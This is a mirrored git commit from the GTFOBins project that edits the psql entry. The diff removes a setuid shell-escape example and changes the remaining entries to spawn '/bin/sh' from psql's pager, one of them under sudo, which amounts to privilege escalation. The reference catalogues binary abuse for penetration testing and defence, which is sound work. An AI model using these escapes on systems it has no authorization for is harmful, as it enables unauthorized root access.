mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Fix psql shell path and remove suid
This commit is contained in:
parent
6a6485c44b
commit
5102eccdfc
@ -1,18 +1,14 @@
|
||||
---
|
||||
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
psql
|
||||
\?
|
||||
!sh
|
||||
suid:
|
||||
- code: |
|
||||
psql
|
||||
\?
|
||||
!sh -p
|
||||
!/bin/sh
|
||||
sudo:
|
||||
- code: |
|
||||
psql
|
||||
\?
|
||||
!sh
|
||||
!/bin/sh
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user